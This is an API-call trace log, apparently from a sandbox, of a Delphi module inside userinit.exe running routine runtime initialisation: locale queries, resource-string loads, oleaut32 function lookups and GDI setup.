[0090.155] GetVersion () returned 0x1db10106
[0090.155] GetCurrentThreadId () returned 0xf4c
[0090.156] GetModuleFileNameA (in: hModule=0x2950000, lpFilename=0x12eedc, nSize=0x105 | out: lpFilename="\xec\xee\x12" (normalized: "c:\\windows\\system32\\ìî\x12")) returned 0x0
[0090.156] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12edb7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.156] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12eecc | out: phkResult=0x12eecc*=0x0) returned 0x2
[0090.156] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12eecc | out: phkResult=0x12eecc*=0x0) returned 0x2
[0090.156] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12eecc | out: phkResult=0x12eecc*=0x0) returned 0x2
[0090.156] lstrcpynA (in: lpString1=0x12edb7, lpString2="\xec\xee\x12", iMaxLength=261 | out: lpString1="\xec\xee\x12") returned="\xec\xee\x12"
[0090.156] GetThreadLocale () returned 0x409
[0090.156] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x12eec7, cchData=5 | out: lpLCData="ENU") returned 4
[0090.156] lstrlenA (lpString="\xec\xee\x12") returned 3
[0090.156] LoadStringA (in: hInstance=0x2950000, uID=0xffc4, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0090.156] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1fdcc0
[0090.156] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a70000
[0090.156] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1fecc0
[0090.156] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffc3, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffc1, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffc2, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffd4, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffdd, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffd3, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffd0, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffd7, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffd6, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe8, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe9, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffea, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe7, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe5, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe3, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe2, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe1, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffe0, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xffff, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xfffe, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xfffd, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xfffc, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xfffb, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0090.157] LoadStringA (in: hInstance=0x2950000, uID=0xfffa, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xfff9, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xfff8, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xfff7, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xfff6, lpBuffer=0x12f000, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xfff4, lpBuffer=0x12efec, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0090.158] LoadStringA (in: hInstance=0x2950000, uID=0xffe4, lpBuffer=0x12efec, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0090.158] GetVersionExA (in: lpVersionInformation=0x12f384*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2950000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x95\x02·\"\x95\x02\x1cô\x12") | out: lpVersionInformation=0x12f384*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0090.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.158] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0090.158] GetThreadLocale () returned 0x409
[0090.158] GetThreadLocale () returned 0x409
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Jan") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x12f25c, cchData=256 | out: lpLCData="January") returned 8
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Feb") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x12f25c, cchData=256 | out: lpLCData="February") returned 9
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Mar") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f25c, cchData=256 | out: lpLCData="March") returned 6
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Apr") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f25c, cchData=256 | out: lpLCData="April") returned 6
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x12f25c, cchData=256 | out: lpLCData="May") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f25c, cchData=256 | out: lpLCData="May") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Jun") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f25c, cchData=256 | out: lpLCData="June") returned 5
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Jul") returned 4
[0090.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f25c, cchData=256 | out: lpLCData="July") returned 5
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Aug") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f25c, cchData=256 | out: lpLCData="August") returned 7
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Sep") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x12f25c, cchData=256 | out: lpLCData="September") returned 10
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Oct") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x12f25c, cchData=256 | out: lpLCData="October") returned 8
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Nov") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x12f25c, cchData=256 | out: lpLCData="November") returned 9
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Dec") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x12f25c, cchData=256 | out: lpLCData="December") returned 9
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Sun") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Sunday") returned 7
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Mon") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Monday") returned 7
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Tue") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Wed") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Thu") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Thursday") returned 9
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Fri") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Friday") returned 7
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Sat") returned 4
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f25c, cchData=256 | out: lpLCData="Saturday") returned 9
[0090.159] GetThreadLocale () returned 0x409
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="$") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="0") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="0") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x12f3b0, cchData=2 | out: lpLCData=",") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x12f3b0, cchData=2 | out: lpLCData=".") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="2") returned 2
[0090.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x12f3b0, cchData=2 | out: lpLCData="/") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0090.160] GetThreadLocale () returned 0x409
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f284, cchData=256 | out: lpLCData="1") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0090.160] GetThreadLocale () returned 0x409
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f284, cchData=256 | out: lpLCData="1") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x12f3b0, cchData=2 | out: lpLCData=":") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="AM") returned 3
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="PM") returned 3
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="0") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="0") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f2b8, cchData=256 | out: lpLCData="0") returned 2
[0090.160] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x12f3b0, cchData=2 | out: lpLCData=",") returned 2
[0090.160] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0090.160] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0090.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0090.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0090.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0090.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0090.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0090.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0090.162] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0090.162] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0090.162] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0090.163] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0090.163] GetDC (hWnd=0x0) returned 0x2b010799
[0090.163] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0090.163] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.163] GetDC (hWnd=0x0) returned 0x2b010799
[0090.163] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0090.163] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.163] CreatePalette (plpal=0x12f014) returned 0x3508085e
[0090.163] GetStockObject (i=7) returned 0x1b00017
[0090.163] GetStockObject (i=5) returned 0x1900015
[0090.163] GetStockObject (i=13) returned 0x18a002e
[0090.163] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.163] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff3d, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff3c, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff3b, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff3a, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff39, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff38, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff37, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff36, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff35, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff34, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff33, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff32, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff31, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff30, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff4f, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff4e, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff4d, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0090.164] LoadStringA (in: hInstance=0x2950000, uID=0xff4c, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0090.164] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0090.164] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0090.164] GetCurrentThreadId () returned 0xf4c
[0090.165] GlobalAddAtomA (lpString="WndProcPtr0295000000000F4C") returned 0xc154
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfefc, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfefb, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfefa, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef9, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef8, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef7, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef6, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef5, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef4, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef3, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef2, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef1, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xfef0, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0f, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0e, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0d, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0c, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0b, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff0a, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff09, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff08, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0090.165] LoadStringA (in: hInstance=0x2950000, uID=0xff07, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff06, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff05, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff04, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff03, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff02, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff01, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff00, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1f, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1e, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1d, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1c, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1b, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff1a, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff19, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff18, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff17, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff16, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff15, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff14, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff13, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff12, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
